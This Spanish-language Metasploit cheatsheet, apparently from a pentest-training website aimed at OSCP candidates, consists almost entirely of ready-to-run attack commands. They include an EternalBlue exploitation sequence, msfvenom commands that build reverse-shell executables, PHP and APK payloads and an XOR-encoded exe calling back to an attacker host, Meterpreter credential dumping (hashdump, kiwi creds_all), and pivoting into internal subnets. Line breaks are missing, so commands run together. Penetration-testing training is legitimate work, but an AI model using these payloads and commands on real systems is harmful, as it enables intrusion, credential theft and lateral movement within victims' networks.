# Inicio & configuración de la base de datos
Inicializa primero la base PostgreSQL — almacena hosts, servicios y botín, y acelera mucho la búsqueda.
sudo msfdb initmsfconsole -qdb_statusdb_nmap -sV -sC 10.10.10.5hosts; servicesworkspace -a client_x# Buscar & seleccionar módulos
Encuentra el módulo correcto rápido con filtros. Metasploit trae 2000+ exploits y miles de módulos auxiliares.
search eternalbluesearch type:exploit platform:windows cve:2021search name:smb type:auxiliaryuse 0info# El flujo de explotación
El bucle central: use → ajustar opciones → check → exploit. El mismo patrón para cada módulo.
use exploit/windows/smb/ms17_010_eternalblueshow optionsset RHOSTS 10.10.10.5set LHOST tun0set LPORT 443checkexploit -j# Payloads
Elige un payload acorde al objetivo y tu red. Staged (/) necesita un stager; stageless (_) es un único blob autónomo.
show payloadsset payload windows/x64/meterpreter/reverse_tcpset payload windows/x64/meterpreter_reverse_httpsset payload linux/x64/shell_reverse_tcpwindows/.../reverse_tcp) envía primero un stager pequeño; stageless (meterpreter_reverse_tcp) es un solo blob — más fiable en enlaces inestables.# multi/handler — recibir cualquier shell
Usa el handler para recibir la conexión de un payload que generaste con msfvenom o dejaste manualmente.
use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; runmsfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; run"set ExitOnSession false# msfvenom — generar payloads
Crea archivos de payload autónomos en cualquier formato. Recíbelos con un multi/handler correspondiente.
msfvenom -l payloadsmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -o shell.exemsfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f elf -o shell.elfmsfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f raw -o shell.phpmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -e x64/xor_dynamic -i 5 -o enc.exemsfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=443 -o app.apk# Comandos Meterpreter
Una vez tengas una sesión Meterpreter, estos son los comandos del día a día.
sysinfo; getuidgetsystemgetprivshashdumpupload /tmp/winPEAS.exe C:\\Windows\\Temp\\download C:\\Users\\admin\\Desktop\\proof.txtshellmigrate -N explorer.exeload kiwi; creds_all# Gestión de sesiones
Maneja múltiples shells y mejora las shells básicas a Meterpreter.
sessions -lsessions -i 1Ctrl+Zsessions -u 2sessions -c "whoami" -i 1sessions -K# Módulos de post-explotación
Ejecuta módulos post contra una sesión existente para enumeración y persistencia.
run post/multi/recon/local_exploit_suggesterrun post/windows/gather/enum_logged_on_usersrun post/windows/manage/migraterun post/multi/manage/shell_to_meterpreter# Pivoting
Usa un host comprometido como pasarela hacia subredes internas que no puedes alcanzar directamente.
run autoroute -s 10.10.20.0/24use post/multi/manage/autoroute; set SESSION 1; runuse auxiliary/server/socks_proxy; set SRVPORT 1080; run -jproxychains nmap -sT -Pn 10.10.20.10portfwd add -l 3389 -p 3389 -r 10.10.20.10❓ FAQ Metasploit
El framework de pentesting más usado — miles de exploits, payloads, módulos auxiliares y post tras una consola (msfconsole). Buscas un módulo, ajustas sus opciones (RHOSTS, LHOST) y lo lanzas.
msfconsole es la consola interactiva para lanzar módulos. msfvenom genera archivos de payload autónomos (exe, elf, php, apk). A menudo generas con msfvenom y recibes con un multi/handler.
El payload avanzado en memoria de Metasploit. Ofrece transferencia de archivos, getsystem, hashdump, captura de pantalla, keylogging y pivoting — sin escribir en disco, más sigiloso que una shell normal.
use exploit/multi/handler, ajusta payload para que coincida con tu payload de msfvenom, ajusta LHOST/LPORT, y run. Recibe la conexión entrante y abre una sesión.
sessions -l lista, sessions -i ID interactúa, Ctrl+Z envía a segundo plano. Ejecuta sin interactuar con sessions -c 'whoami' -i ID, mejora una shell con sessions -u ID.
Desde Meterpreter, run autoroute -s 10.10.20.0/24, luego usa escáneres auxiliares internamente, o inicia auxiliary/server/socks_proxy y apunta proxychains a él.
Puedes usar Metasploit/Meterpreter en una sola máquina de tu elección; está restringido en las demás, así que domina la explotación manual. msfvenom para payloads suele permitirse — revisa siempre las reglas vigentes.
En Kali: sudo apt update && sudo apt install metasploit-framework. Con el instalador de Rapid7, usa msfupdate. Luego ejecuta msfconsole y reload_all para reconstruir la caché de módulos.
📚 Recursos relacionados
- Cheatsheet Reverse Shell — Payloads fuera de Metasploit cuando msf está restringido (OSCP)
- Cheatsheet Nmap — Inyecta los resultados de db_nmap directo en tu workspace
- Cheatsheet Escalada de Privilegios Windows — Escalar cuando getsystem no basta
- Cheatsheet OSCP — Conoce la regla de «una sola máquina con Metasploit» del examen
Convierte tus sesiones de Metasploit en un informe PDF profesional. La IA rellena CVE, CVSS y severidad.
¿Quieres los 12 020+ comandos?
Esta cheatsheet de Metasploit es solo una rama del mapa. Pentest Mindmap organiza 12 020+ comandos en 34 categorías — de recon a post-explotación — con búsqueda instantánea y copia en un clic.
Empezar gratis →